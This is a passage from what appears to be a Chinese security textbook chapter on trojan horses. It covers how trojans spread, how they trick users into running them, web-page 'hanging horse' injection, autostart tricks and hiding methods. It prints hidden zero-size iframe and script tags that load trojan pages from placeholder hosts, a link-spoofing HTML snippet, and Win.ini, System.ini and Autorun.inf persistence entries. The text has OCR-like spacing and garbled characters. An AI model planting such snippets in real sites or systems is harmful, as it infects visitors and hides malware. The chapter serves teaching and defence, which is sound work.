尤其 是 附件 名 为 * .exe 的 。 
(2) IM 传播 。 因 为 IM(QQ、MSN 等 ) 有 文件 传输 功能 ,所 以 现在 也 有 很 多 木马 通过 
IM 进行 传播 。 恶 意 破坏 者 通常 把 木马 服务 程序 通过 合并 软件 和 其 他 的 可 执行 文件 绑 在 一 
起 ,然后 欺骗 受害 者 去 下 载运 行 。 如 果 受 害 者 相信 这 是 个 好 玩 的 东西 或 者 是 想 要 的 照片 , 当 
接受 并 运行 后 ,就 成 了 木马 的 牺牲 品 了 。 

(3) 下 载 传播 。 在 一 些 个 人 网 站 或 论坛 下 载 共享 软件 时 有 可 能 会 下 载 到 绑 有 木马 的 程 
序 。 所 以 建议 要 下 载 共 享 软件 的 话 最 好 去 比较 知名 的 网 站 。 在 解压 缩 安 装 之 前 也 养 成 对 共 
享 软件 进行 病毒 扫描 的 习惯 。 

(4) 漏洞 植 和 人 。 一 般 是 利用 系统 漏洞 或 应 用 程序 的 漏洞 ,把 配置 好 的 木马 在 目标 主 
机 上 和 运行 就 完成 了 。 这 种 方法 的 难点 是 要 掌握 漏洞 技术 。 例 如 ,IPC 漏洞 .Unicode 漏 
洞 等 。 
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(5) 网 上 邻居 植 和 人 。 网 上 邻居 即 共享 人 侵 。 当 受害 者 的 139 端口 是 开放 的 , 且 有 共享 
的 可 写 目录 时 ,攻击 者 就 可 以 直接 将 木马 或 种 子 放 入 共享 目录 中 。 如 果 使 用 一 个 具有 诱惑 
性 的 名 称 ,或 者 使 用 一 个 具有 欺骗 性 的 扩展 名 ,受害 者 就 可 能 会 运行 这 个 程序 ,于 是 就 被 感 
染 了 。 

(6) 网 页 植 人 。 网 页 植 人 是 比较 流行 的 种 植木 马 方法 , 接 下 来 的 章节 会 重点 讲解 这 种 
方法 。 黑 客 可 以 制作 一 个 ActiveX 控件 , 放 在 网 页 中 ,只 要 用 户 选择 了 安装 ,就 会 自动 从 服 
务 器 上 下 载 一 个 木马 程序 并 运行 ,这 样 就 达到 植 入 木马 的 目的 了 。 按 此 方法 制作 的 木马 对 
任何 版 本 的 IE 都 有 效 , 但 是 在 打开 网 页 的 时 候 弹出 对 话 框 要 用 户 确定 是 否 安装 ,只 要 用 户 
不 安装 ,黑客 们 就 不 能 达到 目的 了 。 

另 一 类 种 植木 马 的 技术 主要 是 利用 微软 的 HTML Object 标签 的 一 个 漏洞 。Object 标 
得 主要 是 用 来 把 ActiveX 控件 插入 HTML 页 面 中 。 由 于 加 载 程序 没有 根据 描述 远程 
Object 数据 位 置 的 参数 检查 加 载 文件 的 性 质 , 因 此 Web 页 面 中 的 木马 会 悄悄 地 运行 。 对 于 
DATA 所 标记 的 URL ,IE 会 根据 服务 器 返回 HTTP 头 中 的 Content-Type 来 处 理 数 据 , 也 
就 是 说 如 果 HTTP 头 中 返回 的 是 appication/hta 等 ,那么 该 文件 就 能 够 执行 ,而 不 管 IE 的 
安全 级 别 有 多 高 。 如 果 恶 意 攻击 者 把 该 文件 换 成 木马 ,并 修改 其 中 FTP 服务 器 的 地 址 和 文 
件 名 ,将 其 改 为 他 们 的 FTP 服务 器 地 址 和 服务 器 上 木马 程序 的 路 径 。 那 么 当 别 人 浏览 该 网 
页 时 ,会 出 现 “Internet Explorer 脚本 错误 ”的 错误 信息 ,询问 是 否 继续 在 该 页 面 上 运行 错误 
脚本 , 当 单 击 “ 是 ”按钮 便 会 自动 下 载 并 运行 木马 。 

还 有 一 种 网 页 木马 是 直接 在 网 页 的 源 代码 中 插入 木马 代码 ,只 要 对 方 打开 这 个 网 页 就 
会 中 上 木马 ,而 受害 者 对 此 还 一 无 所 知 。 

2. 首次 运行 

随 着 安全 意识 的 加 强 , 大 多 数 上 网 用 户 警 惕 性 越 来 越 高 , 想 骗取 他 们 执行 木马 是 件 很 困 
难 的 事 。 即 使 不 是 计算 机 高 手 都 知道 ,一 见 到 是 陌生 的 EXE 文件 便 不 会 轻易 运行 它 , 因 而 
中 木马 的 机 会 也 就 相对 减少 了 。 对 于 此 ,黑客 们 是 不 会 甘心 的 ,于 是 想 尽 办 法 引诱 或 欺骗 用 
户 运行 木马 (种 子 )。 

(1) 冒充 为 图 像 文件 。 首 先 , 黑 客 最 常 使 用 骗 别 人 执行 木马 的 方法 ,就 是 将 特洛伊 木马 
说 成 为 图 像 文 件 , 如 照片 等 ,应 该 说 这 是 一 个 最 不 符合 逻辑 的 方法 ,但 却 是 很 多 人 中 招 的 有 
效 而 又 实用 的 方法 。 

只 要 入 侵 者 扮 成 美女 或 其 他 诱惑 的 文件 名 ,再 假装 传送 照片 给 受害 者 ,受害 者 就 会 立刻 
执行 它 。 

(2) 程序 捆绑 欺骗 。 通 常 有 经 验 的 用 户 , 是 不 会 将 图 像 文件 和 可 执行 文件 混淆 的 ,所 以 
很 多 入 侵 者 一 不 做 二 不 休 , 干 脆 将 木马 程序 说 成 是 应 用 程序 。 然 后 青 变 着 花样 欺骗 受害 者 ， 
例如 ,说 成 是 新 出 炉 的 游戏 .无 所 不 能 的 黑客 程序 等 ,目的 是 让 受害 者 立刻 执行 它 。 而 木马 
程序 执行 后 一 般 是 没有 任何 反应 的 ,于 是 在 悄 无 声息 中 ,很 多 受害 者 便 以 为 是 传送 时 文件 损 
坏 了 而 不 再 理会 它 。 

如 果 有 更 小 心 的 用 户 , 上 面 的 方法 有 可 能 会 使 他 们 的 产生 怀疑 ,所 以 就 衍生 了 一 些 拥 绑 
程序 。 捆 绑 程序 是 可 以 将 两 个 或 以 上 的 可 执行 文件 (EXE 文件 ) 结 合 为 一 个 文件 , 当 执 行 这 
个 组 合 文件 时 ,两 个 可 执行 文件 就 会 同时 执行 。 如 果 入 侵 者 将 一 个 正常 的 可 执行 文件 (一 些 
小 游戏 如 wrap. exe) 和 一 个 木马 程序 捆绑 ,由 于 执行 组 合 文件 时 wrap. exe 会 正常 执行 , 受 
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害 者 在 不 知情 时 木马 程序 也 同时 执行 了 。 

常用 的 捆绑 软件 有 joiner,Hammer Binder 等 。 

(3) 以 Z-file 伪装 加 密 程序 。 黑 客 会 将 木马 程序 和 小 游戏 捆绑 , 青 用 Z-file 加 密 及 将 
此 “混合 体 ” 发 给 受害 者 ,由 于 看 上 去 是 图 像 文 件 , 受 害 者 往往 都 不 以 为 然 ,打开 后 又 只 是 
一 般 的 图 片 ,最 可 怕 的 地 方 还 在 于 就 连 杀 毒 软件 也 检测 不 出 它 内 藏 特洛伊 木马 。 当 打消 
了 受害 者 警惕 性 后 ,再 让 他 用 WinZip 解压 缩 及 执行 伪装 体 , 这 样 就 成 功 地 安装 了 木马 
程序 。 

(4) 伪装 成 应 用 程序 扩展 组 件 。 此 类 属于 最 难 识别 的 特洛伊 森马。 黑客 们 通常 将 木马 
程序 写成 任何 类 型 的 文件 (如 dll、ocx 等) 然后 挂 在 一 个 十 分 出 名 的 软件 中 ,如 OICQ。 巾 于 
OICQ 本 身 己 有 一 定 的 知名 度 , 没 有 人 会 怀疑 它 的 安全 性 ,更 不 会 有 人 检查 它 的 文件 是 否 多 
了 。 而 当 受 害 者 打开 OICQ 时 ,这 个 有 问题 的 文件 即 会 同时 执行 。 此 种 方式 相 比 起 用 捆绑 
程序 有 一 个 更 大 的 好 处 , 那 就 是 不 用 更 改 被 入侵 者 的 登录 文件 ,以 后 每 当 其 打开 OICQ 时 木 
马 程序 就 会 同步 运行 , 相 较 一 般 特洛伊 木马 可 说 是 “ 踏 雪 无 痕 ”。 

3. 网 站 挂 马 技术 

网 页 挂 马 就 是 攻击 者 在 正常 的 页 面 中 (通常 是 网 站 的 主页 ) 插 入 一 段 恶意 代码 。 浏 览 者 
在 打开 该 页 面 的 时 候 , 这 段 代码 被 执行 ,然后 把 某 木马 的 服务 器 端 程序 或 种 子 下 载 到 浏览 者 
本 地 并 运行 ,进而 控制 浏览 者 的 主机 。 网 站 被 挂 马 是 管理 员 们 无 论 如 何 都 无 法 忍受 的 。 
Web 服务 器 被 攻克 不 算 ,还 * 城 门 失火 两 及 池 鱼 ”, 网 站 的 浏览 者 也 不 能 幸免 。 这 无 论 是 对 
企业 的 信誉 ,还 是 对 管理 员 的 技术 能 力 都 是 沉重 的 打击 。 常 见 的 网 站 挂 马 技术 包括 框架 挂 
马 ,js 挂 马 . 图 片 伪 装 挂 马 、 网 络 钓鱼 挂 马 、 伪 装 挂 马 。 下 面 结合 实例 对 网 页 挂 马 的 技术 进行 
分 析 。 

(1) 框架 挂 马 。 在 HTML 编程 中 ,iframe 语句 可 以 加 载 到 任意 网 页 中 并 执行 。 网 页 木 
马 攻击 者 利用 这 种 技术 进行 框架 挂 马 。 框 架 挂 马 是 最 早 也 是 最 有 效 的 一 种 网 络 挂 马 技术 。 
通常 的 挂 马 用 的 代码 如 下 。 


< iframe. src= http://www.xxx.com/muma. html width = 0 height = 0></iframe> 


上 面 这 名 代码 的 意思 是 ,在 打开 插入 该 句 代 码 的 网 页 后 ,也 就 打开 了 http://www. 
xxx. com/muma. html 页 面 ,但 是 由 于 它 的 长 和 宽 都 为 “0”, 因 此 很 难 察觉 ,非常 具有 隐 
蔽 性 。 

(2) js 挂 马 。js 挂 马 是 一 种 利用 js 脚本 文件 调用 的 原理 进行 的 网 页 挂 马 技术 ,这 种 挂 
马 技术 也 非常 隐蔽 。 例 如 ,黑客 可 以 先 制作 一 个 .js 文件 ,然后 利用 js 代码 调用 到 挂 马 的 网 
页 。 通 常 代码 如 下 。 


< script. language = javascript. src = http://www.xocx. com/gm. js></script> 


在 上 面 这 句 代码 中 ,http://www. xxx. com/gm. js 就 是 一 个 js 脚本 文件 ,攻击 者 通过 
它 调用 和 执行 木马 的 服务 端 。 这 些 js 文件 一 般 都 可 以 通过 工具 生成 ,攻击 者 只 需 输入 相关 
的 选项 就 可 以 了 。 

(3) 图 片 伪 装 挂 马 。 随 着 防毒 技术 的 发 展 ,黑客 手段 也 不 停 地 更 新 ,图 片 伪装 挂 马 技术 
是 逃避 杀毒 监视 的 新 技术 。 攻 击 者 将 木马 代码 植 入 到 test. jpg 图 片 文件 中 ,这 些 嵌 入 代码 
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的 图 片 都 可 以 用 工具 生成 ,攻击 者 只 需 输 入 相关 的 选项 就 可 以 了 。 图 片 木马 生成 后 ,再 利用 
代码 调用 执行 ,是 比较 新 颖 的 一 种 挂 马 隐蔽 方法 ,示例 代码 如 下 。 


< iframe. src = "http://www.xxx.com/test.htm" height = 0 width = 0> </iframe> 
< img src = "http://www. xxx. com/test. jpg"></center> 


这 两 句 代码 的 意思 是 , 当 用 户 打 开 http://www. xxx. com/test. htm 时 ,显示 给 用 户 的 
是 http://www. xxx. com/test. jpg, 而 http://www. xxx. com/test. htm 网 页 代码 也 随 之 
运行 。 

(4) 网 络 钓鱼 挂 马 。 钓 鱼 是 网 络 中 最 常见 的 欺骗 手段 ,黑客 们 利用 人 们 的 猎奇 、 贪 禁 等 
心理 ,伪装 构造 一 个 链接 或 者 一 个 网 页 ,利用 社会 工程 学 欺骗 方法 ,引诱 受害 者 来 单 击 。 当 
受害 者 打开 一 个 看 似 正常 的 页 面 时 ,木马 代码 随 之 运行 ,隐蔽 性 极 高 。 这 种 方式 往往 会 欺骗 
用 户 输入 某 些 个 人 隐私 信息 ,然后 窃取 个 人 隐私 相关 联 。 例 如 ,攻击 者 模仿 腾讯 公司 设计 了 
一 个 获取 QQ 币 的 页 面 ,引诱 输入 QQ 账号 和 口令 。 等 用 户 输入 完 提 交 后 ,就 把 这 些 信 息 发 
送 到 攻击 者 指定 的 地 方 。 

(5) 伪装 挂 马 。 伪 装 挂 马 是 高 级 欺骗 技术 之 一 。 黑 客 利 用 IE 或 者 Fixfox 浏览 器 的 设 
计 缺 陷 制 造 的 一 种 高 级 欺骗 技 术 , 当 用 户 访问 木马 页 面 时 地 址 栏 显示 www. sina. com 或 者 
security. ctocio. com. cn 等 用 户 信 任 地 址 ,其 实 却 打 开 了 被 挂 马 的 页 面 ,从 而 实现 欺骗 。 示 
例 代码 如 下 。 


<p><a id= "qipian" href = "http://www. hacker. com. cn"></a></p> 
<a href = "http://safe. it168. com" target = "_blank"> 
<table> 

<caption> 

< label for = "qipian"> 

<u style = "cursor;pointer;color;blue"> 

</u> 

</caption> 

</table> 

</a> 

</div> 


上 面 代 码 的 效果 ,在 貌似 http://safe. it168. com 的 链接 上 单 击 却 打开 了 http://www. 
hacker. com. cn 网 站 。 


5.3.2 自 启 动 技术 

木马 植 入 受害 系统 的 难度 非常 大 ,因此 ,不 能 每 次 都 依靠 植 入 技术 来 启动 木马 。 一 旦 成 
功 植 入 ,木马 可 以 靠 一 些 自动 手段 在 被 害 系 统 重启 时 加 载 自己 。 这 些 技 术 如 下 。 

1. 修改 批 处 理 

这 是 一 种 很 上 古老 的 方法 ,但 至 今 仍 有 木马 在 使 用 。 这 种 技术 一 般 通 过 修改 下 列 3 个 文 
件 来 实现 。 

(1) Autoexec. bat( 自 动 批 处 理 ,在 引导 系统 时 执行 ) 。 

(2) Winstart. bat( 在 启动 GUI 图 形 界 面 环境 时 执行 ) 。 
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(3) Dosstart. bat( 在 进入 MS-DOS 方式 时 执行 ) 。 

例如 ,编辑 C:\windows\Dosstart. bat, 加 入 start Notepad, 当 进 入 “MS-DOS 方式 ”时 ， 
就 可 以 看 到 记事 本 被 启动 了 。 

2. 修改 系统 配置 

这 是 经 常 使 用 的 方法 之 一 ,通过 修改 系统 配置 文件 System. ini、Win. ini 来 达到 自动 运 
行 的 目的 ,涉及 范围 如 下 。 

在 Win. ini 文件 中 : 


[windows] 
load= 程序 名 
run = 程序 名 


在 System. ini 文件 中 : 


[boot] 
shell = Explorer. exe 


其 中 修改 System. ini 中 Shell 值 的 情况 要 多 一 些 , 病 毒 木 马 通过 修改 这 里 使 自己 成 为 
Shell ,然后 加 载 Explorer. exe, 从 而 达到 控制 用 户 计算 机 的 目的 。 

3. 借助 自动 播放 功能 

在 被 木马 程序 应 用 之 前 ,该 方法 不 过 是 被 发 烧 友 用 来 修改 硬盘 的 图 标 而 已 ,如 今 它 被 赋 
予 了 新 的 意义 ,黑客 甚至 声称 这 是 Windows 的 新 Bug。 

Windows 的 自动 播放 功能 确实 有 很 多 炊 端 ,早年 许多 用 户 因 为 自动 运行 的 光盘 中 带 有 
CIH 病毒 而 “中 招 ”, 现 在 不 少 软件 可 以 方便 地 禁止 光盘 的 自动 运行 ,但 硬盘 呢 ?” 其 实 硬盘 
也 支持 自动 运行 ,可 尝试 在 D 盘 根 目录 下 新 建 一 个 Autorun. inf, 用 记事 本 打开 它 , 输 入 如 
下 内 容 。 


[autorun] 
open = Notepad. exe 


保存 后 进入 “我 的 电脑 ”, 按 F5 键 刷 新 ,然后 双击 D 盘 盘 符 , 记 事 本 打开 了 ,而 DD 盘 却 没 
有 打开 。 

当然 ,以 上 只 是 一 个 简单 的 示例 ,黑客 做 得 要 精密 很 多 ,他 们 会 把 程序 改名 为 .exe” 
(中 文 的 全 角 空 格 ) ,这 样 在 Autorun. inf 中 只 会 看 到 “open 一 ”, 而 后 边 的 内 容 被 忽略 ,此 种 
行径 常 在 修改 系统 配置 时 使 用 ,如 “run 二 ”。 为 了 更 好 地 隐藏 自己 ,其 程序 运行 后 ,还 会 打开 
硬盘 ,使 人 难以 觉察 。 

由 此 可 以 推 想 ,如 果 打 开 了 D 盘 的 共享 ,黑客 就 可 以 将 木马 和 一 个 Autorun. inf 存 人 该 
分 区 中 , 当 Windows 自动 刷新 时 ,也 就 “中 招 ” 了 ,因此 , 千 万 不 要 共享 任何 根 目录 ,当然 更 不 
能 共享 系统 分 区 。 

4. 通过 注册 表 中 的 Run 来 启动 

这 也 是 一 个 很 老 的 方法 ,但 大 多 数 的 黑客 仍 在 使 用 这 种 方法 。 通 过 在 Run、RunOnce、 
RunOnceEx、RunServices 以 及 RunServicesOnce 中 添加 键 值 ,可 以 比较 容易 地 实现 程序 的 
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加 载 。 黑 客 尤其 喜欢 在 带 Once 的 主键 中 做 手脚 。 在 程序 运行 后 ,如 果木 马 自 动 将 键 值 删 
除 , 当 用 户 使 用 注册 表 修 改 程序 查看 时 就 不 会 发 现 异 样 。 在 退出 时 (或 关闭 系统 时 ) ,木马 程 
序 又 自动 添加 上 需要 的 键 值 , 达 到 隐藏 自己 的 目的 。 
通过 文件 关联 启动 

这 是 一 种 很 受 黑客 喜爱 的 方式 ,通过 EXE 文件 的 关联 (主键 为 exefile) ,让 系统 在 执行 
任何 程序 之 前 都 运行 木马 。 通 常 修改 的 还 有 txtfile( 文 本 文件 的 关联 )、regfile( 注 册 表 文件 
关联 ,一 般 用 来 防止 用 户 恢复 注册 表 , 如 双击 . reg 文件 就 关闭 计算 机 )、unkown( 未 知 文件 
关联 ) 。 为 了 防止 用 户 恢复 注册 表 , 用 此 方法 的 黑客 通常 还 连带 清除 scanreg. exe、sfc. exe、 
Extrac32. exe 和 regedit. exe 等 程序 ,以 阻碍 用 户 修复 。 

6. 通过 API HOOK 启动 

这 种 方法 较为 高 级 ,通过 替换 系统 的 DLL 文件 ,让 系统 启动 指定 的 程序 。 例 如 ,拨号 上 
网 的 用 户 必须 使 用 Rasapi32. dll 中 的 API 函数 来 进行 连接 ,那么 黑客 就 会 蔡 换 这 个 DLL， 
当 应 用 程序 调用 这 个 API 函数 时 ， 黑客 的 程序 融会 先 局 动 ， 然后 调用 真正 的 函数 完成 这 个 
功能 (特别 提示 : 木马 可 不 一 定 是 EXE, 还 可 以 是 DLL 或 VxD) ,这 样 既 方 便 又 隐蔽 (不 上 
网 时 根本 不 运行 )。 如 果 感 染 了 此 种 病毒 ,只 能 重 装 系统 。 

7. 通过 VxD 启动 

此 方法 也 是 较 高 级 的 方法 之 一 ,通过 把 木马 写成 VxD 形式 加 载 ,直接 控制 系统 底层 。 
这 种 方法 极为 罕见 ,它们 一 般 在 注册 表 “HKEY_ LOCAL_MACHINE\System\Current 
ControlSet\Services\VxD” 主 键 中 启动 ,很 难 发 觉 ,解决 方法 最 好 也 是 用 Ghost 恢复 或 重新 
安装 系统 。 

8. 通过 浏览 网 页 启动 

这 种 方法 利用 了 MIME 的 漏洞 。 这 是 2001 年 黑客 中 最 流行 的 手法 ,因为 它 简 单 有 效 ， 
加 上 宽带 网 的 流行 , 令 用 户 防不胜防 。 想 一 想 , 仅 仅 是 鼠标 变 一 下 “沙漏 ”, 木 马 就 安装 妥当 ， 
Internet 真是 太 “ 方 便 "* 了 。 不 过 近年 来 这 种 方法 的 使 用 有 所 减少 ,一 方面 许多 人 都 改 用 高 
版 本 的 浏览 器 , 另 一 方面 ,大 部 分 个 人 主页 空间 都 不 允许 上 传 .eml 文件 了 。 

MIME 被 称 为 多 用 途 Internet 邮件 扩展 (Multipurpose Internet Mail Extensions) , 是 
一 种 技术 规范 , 原 用 于 电子 邮件 ,现在 也 可 以 用 于 浏览 器 。MIME 对 邮件 系统 的 扩展 是 巨 
大 的 ,在 它 出 现 前 ,邮件 内 容 如 果 包 含 声音 和 动画 ,就 必须 把 它 变 为 ASCII 码 或 把 二 进 制 的 
信息 变 成 可 以 传送 的 编码 标准 ,而 接收 方 必须 经 过 解码 才 可 以 获得 声音 和 图 画 信 息 。 
MIME 提供 了 一 种 可 以 在 邮件 中 附加 多 种 不 同 编码 文件 的 方法 ,这 与 原来 的 邮件 是 大 不 相 
同 的 。 而 现在 MIME 已 经 成 为 了 HTTP 协议 标准 的 一 部 分 。 

9. 利用 Java Applet 

跨 时 代 的 Java 更 高 效 、 更 方便 ,但 也 能 悄悄 地 修改 注册 表 , 让 用 户 千 百 次 地 访问 黄 ( 黑 ) 
色 网 站 ,让 用 户 关 不 了 机 ,还 可 以 让 用 户 中 木马 。 这 种 方法 其 实 很 简单 , 先 利 用 HTML 把 
木马 下 载 到 计算 机 的 缓存 中 ,然后 修改 注册 表 ,指向 其 程序 。 

10. 利用 系统 自动 运行 的 程序 

这 一 条 主要 利用 用 户 的 麻痹 大 意 和 系统 的 运行 机 制 进行 ,命中 率 很 高 。 在 系统 运行 
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程 中 ,有 许多 程序 是 自动 运行 的 。 例 如 ,磁盘 空间 已 满 时 ,系统 自动 运行 “磁盘 清理 ”程序 
(cleanmgr. exe)。 启 动 资源 管理 器 失败 时 ,双击 桌面 将 自动 运行 “任务 管理 器 ”程序 
(Taskman. exe)。 格 式 化 磁盘 完成 后 ,系统 将 提示 使 用 “磁盘 扫描 "程序 (scandskw. exe)。 
单 击 “ 帮 助 ”菜单 或 按 Fl 键 时 ,系统 将 运行 Winhelp. exe 或 Hh. exe 打开 帮助 文件 。 启 动 
时 ,系统 将 自动 启动 “系统 栏 ”程序 (SysTray. exe)、“ 输 入 法 ”程序 (internat. exe) 以 及 “注册 
表 检 查 ” 程 序 (scanregw. exe)、“ 计 划 任 务 ” 程 序 (Mstask. exe) 以 及 “电源 管理 ”程序 等 。 

以 上 机 制 都 为 恶意 程序 提供 了 机 会 ,通过 覆盖 这 些 文件 ,不 必修 改 任何 设置 系统 就 会 自 
动 执行 它们 。 而 用 户 在 检查 注册 表 和 系统 配置 时 也 不 会 有 任何 怀疑 ,例如 ,“ 注 册 表 检查 ” 程 
序 的 作用 是 启动 时 检查 和 备份 注册 表 , 正 常情 况 不 会 有 任何 提示 ,那么 它 被 覆盖 后 真 可 谓 是 
“ 神 不 知 、 鬼 不 觉 "。 当 然 ,这 也 许 会 被 “系统 文件 检查 器 ”检查 出 来 。 

黑客 还 有 一 个 “ 偷 天 换 日 ”的 高 招 ,不 覆盖 程序 也 可 达到 这 个 目的 。 这 种 方法 是 利用 
System 目录 比 Windows 目录 优先 的 特点 ,以 相同 的 文件 名 ,将 程序 放 到 System 目录 中 。 
读者 可 以 试 试 ,将 Notepad. exe 复制 到 System 目录 中 ,并 改名 为 Regedit. exe( 注 册 表 编辑 
器 ) ,然后 在 “开始 ”一 “运行” 文本 框 输入 “Regedit” 并 按 Enter 键 ,会 发 现 运行 的 竟然 是 那个 
假冒 的 Notepad. exe。 由 于 这 种 方法 大 部 分 目标 程序 不 是 经 常 被 系统 调用 ,因此 常 被 黑客 
用 来 作为 文件 被 删除 后 的 恢复 方法 。 

11. 其 他 方法 

黑客 还 常常 使 用 名 字 欺 骗 技 术 和 运行 假象 与 之 配合 。 上 述 的 全 角 空 格 主 文件 名 ”. exe” 
就 是 一 例 名 字 欺 骗 技 术 。 另 外 ,常见 的 有 在 修改 文件 关联 时 ,使 用 特殊 字符 (例如 使 用 
ASCII 值 255, 输 入 时 先 按 下 Alt 键 ,然后 在 小 键盘 上 输入 255) 作 为 文件 名 , 当 这 个 字符 出 
现在 注册 表 中 时 ,人 们 往往 很 难 发 现 它 的 存在 。 此 外 还 有 利用 字符 相似 性 的 ,如 Systray. 
exe 和 5ystray(5 与 大 写 S 相似 ); 长 度 相似 性 的 ,如 Explorer. exe 和 Explore. exe( 后 者 比 
前 者 少 一 个 字母 ,心理 学 实验 证 明 , 人 的 第 一 感觉 只 识别 前 四 个 字母 ,并 对 长 度 不 敏感 )。 运 
行 假象 则 是 指 运 行 某 些 木 马 时 ,程序 给 出 一 个 虚假 的 提示 来 欺骗 用 户 。 一 个 运行 后 什么 都 
没有 的 程序 ,也 许 会 引起 大 家 的 注意 ,但 对 于 一 个 提示 “内 存 不 足 的 程序 ”, 恐 怕 不 会 引起 多 
少 人 的 重视 。 


5.3.3 隐藏 技术 


木马 为 了 生存 ,使 用 许多 技术 隐藏 自己 的 行为 (进程 .连接 和 端口 )。 在 Windows 9x 时 
代 , 木 马 简单 地 注册 为 系统 进程 就 可 以 从 任务 栏 中 消失 。 在 Windows XP 及 以 后 版 本 中 ,这 
种 方法 遭 到 了 惨败 ,注册 为 系统 进程 不 仅 能 在 任务 栏 中 看 到 ,而 且 可 以 直接 在 Services 中 控 
制 木 马 。 使 用 隐藏 窗 体 或 控制 台 的 方法 也 不 能 欺骗 无 所 不 见 的 Administrator 用 户 。 在 
Windows NT/Windows 2000/Windows XP 下 .Administrator 是 可 以 看 见 所 有 进程 的 。 防 
火 墙 和 各 种 网 络 工具 的 发 展 也 对 木马 提出 了 进一步 的 考验 ,通信 过 程 容易 被 发 现 。 本 节 的 
内 容 主要 总 结 目前 用 于 木马 隐藏 的 各 种 技术 ,非常 值得 学 习 和 研究 。 

1. 反弹 式 木 马 技术 

网 络 安全 和 现实 生活 中 的 情形 往往 有 惊人 的 相似 , 它 也 重复 着 “完善 一 漏洞 一 再 完善 
这 样 一 个 螺旋 式 发 展 的 过 程 。 木 马 与 防火 墙 的 对 话 , 也 有 着 这 样 的 过 程 。 特 洛 伊 木马 这 样 
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一 种 黑客 技术 ,一 出 现 就 引起 了 人 们 的 关注 。 除 了 从 不 同 的 角度 防范 木马 行为 的 发 生 ,防火 
墙 技术 的 发 展 也 有 效 地 遏制 了 木马 的 泛滥 。 

但 是 有 些 用 户 还 是 发 现 ,即使 将 自己 的 防火 墙 设置 为 禁止 外 来 主动 连接 ,防范 了 理论 上 
的 木马 ,也 无 法 排除 信息 泄露 的 可 能 。 网 络 利用 率 常 常 居 高 不 下 ,不 正常 的 连接 还 是 会 频繁 
出 现 。 那 么 ,现在 就 不 得 不 关注 木马 技术 的 新 发 展 一 一 反弹 式 木马 。 

(1) 反弹 式 木 马 的 概念 。 大 家 知道 ,所 谓 的 “特洛伊 木马 ”, 就 是 一 种 基于 客户 机 /服务 
器 模式 的 远程 控制 程序 , 它 让 用 户 的 计算 机 运行 服务 器 端的 程序 ,这 个 服务 器 端的 程序 会 在 
用 户 的 计算 机 上 打开 监听 的 端口 。 这 就 给 黑客 人 侵 用 户 计算 机 打开 了 一 扇 进 出 的 门 , 通 过 
它 黑客 就 可 以 利用 木马 的 客户 端 人 侵 用 户 的 计算 机 系统 。 

随 着 防火 墙 技术 的 提高 和 发 展 ,基于 IP 包 过 滤 规 则 来 拦截 木马 程序 可 以 有 效 地 防止 外 
部 连接 ,因此 黑客 在 无 法 取得 连接 的 情况 下 ,也 就 无 所 作为 了 。 

然而 ,“ 道 高 一 尺 , 魔 高 一 丈 ” 这 个 安全 领域 中 的 “规律 "无 时 不 在 起 作用 。 聪 明 的 木马 编 
制 者 又 发 明了 所 谓 的 “反弹 式 木 马 ”。 它 利用 防火 墙 对 内 部 发 起 的 连接 请 求 无 条 件 信 任 的 特 
点 ,假冒 是 系统 的 合法 网 络 请 求 来 取得 对 外 的 端口 ,再 通过 某 些 方式 连接 到 木马 的 客户 端 ， 
从 而 窃取 用 户 计算 机 的 资料 ,同时 遥控 计算 机 本 身 。 

(2) 反弹 式 木 马 的 原理 。 常 见 的 普通 木马 是 驻 留 在 用 户 计算 机 中 的 一 段 服务 程序 ,而 
攻击 者 控制 的 则 是 相应 的 客户 端 程序 。 服 务 程序 通过 特定 的 端口 ,打开 用 户 计算 机 的 连接 
资源 。 一 旦 攻击 者 所 掌握 的 客户 端 程序 发 出 请 求 ,木马 便 和 它 连 接 起 来 ,将 用 户 的 信息 窃取 
出 去 。 这 类 木马 的 一 般 工 作 模式 如 图 5-3 所 示 。 


攻 


图 5-3 特洛伊 木马 的 一 般 工 作 原 理 


可 见 , 此 类 木马 的 最 大 弱点 在 于 攻击 者 必须 和 目标 主机 建立 连接 ,木马 才能 起 作用 。 所 
以 在 对 外 部 连接 审查 严格 的 防火 墙 策略 下 ,这 样 的 木马 很 难 工作 起 来 。 
反弹 式 木 马 在 工作 原理 上 就 与 常见 的 木马 不 一 样 。 图 5-4 所 示 的 是 反弹 式 木马 的 一 般 
工作 原理 。 由 于 反弹 式 木 马 使 用 的 是 系统 信任 的 端口 ,系统 会 认为 木马 是 普通 应 用 程序 ,而 
不 对 其 连接 进行 检查 。 防 火 墙 在 处 理 内 部 发 出 的 连接 时 ,也 就 信任 了 反弹 式 木 马 。“ 网 络 神 
”是 目前 最 常见 的 一 种 反弹 式 木马 , 它 的 工作 原理 就 是 这 样 的 。 这 充分 说 明了 一 条 至 理 名 
: 堡垒 总 是 从 内 部 被 突破 的 。 
(3) 如 何 防范 反弹 式 木 马 。 推 荐 大 家 使 用 个 人 防火 墙 , 其 采用 独特 的 “内 墙 ?方式 应 用 
程序 访问 网 络 规则 ,专门 对 付 存 在 于 用 户 计算 机 内 部 的 各 种 不 法 程序 对 网 络 的 应 用 ,从 而 可 
以 有 效 地 防御 像 “ 反 弹 式 木马 ?那样 的 骗取 系统 合法 认证 的 非法 程序 。 当 用 户 计算 机 内 部 的 
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注 怖 或 二 沪 


图 5-4 反弹 式 木马 骗取 防火 墙 信任 


应 用 程序 访问 网 络 的 时 候 , 必 须 经 过 防火 墙 内 墙 的 审核 。 合 法 的 应 用 程序 被 审核 通过 ,而 非 
法 的 应 用 程序 将 会 被 防火 墙 的 “内 墙 ? 所 拦截 。 

2. 用 ICMP 方法 隐藏 连接 

一 般 的 木马 都 是 通过 建立 TCP 连接 来 进行 命令 和 数据 的 传递 的 ,但 是 这 种 方法 有 一 个 
致命 的 漏洞 ,就 是 木马 在 等 待 和 运行 的 过 程 中 ,始终 有 一 个 和 外 界 联系 的 端口 打开 着 ,这 是 
木马 的 弱点 所 在 ,也 是 高 手 们 查找 木马 的 杀手 铜 之 一 。 而 木马 也 是 在 斗争 中 不 断 进步 ,不 断 
成 长 的 ,其 中 一 种 ICMP 木马 就 彻底 摆脱 了 端口 的 束缚 ,成 为 黑客 和信 侵 后 门 工 具 中 的 佼 
佼 者 。 

ICMP 的 全 称 是 Internet Control Message Protocol( 因 特 网 控制 报 文 协议 ), 它 是 IP 协 
议 的 附属 协议 ,用 来 传递 差错 报 文 以 及 其 他 需要 注意 的 消息 报 文 ,这 个 协议 常常 为 TCP 或 
UDP 协议 服务 ,但 是 也 可 以 单独 使 用 ,例如 著名 的 工具 ping 就 是 通过 发 送 接收 ICMP_ 
